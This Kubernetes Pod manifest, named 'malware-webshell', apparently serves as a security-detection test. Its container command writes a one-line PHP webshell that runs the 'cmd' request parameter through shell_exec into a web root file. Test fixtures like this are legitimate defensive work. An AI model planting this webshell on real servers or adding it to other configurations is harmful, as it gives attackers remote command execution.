apiVersion: v1
kind: Pod
metadata:
  name: malware-webshell
spec:
  containers:
  - name: web-container
    image: busybox
    # This writes a common PHP webshell signature to a file
    command: ['sh', '-c', 'echo "<?php echo shell_exec($_GET["cmd"]); ?>" > /var/www/html/shell.php || mkdir -p /var/www/html && echo "<?php echo shell_exec($_GET["cmd"]); ?>" > /var/www/html/shell.php && sleep 3600']
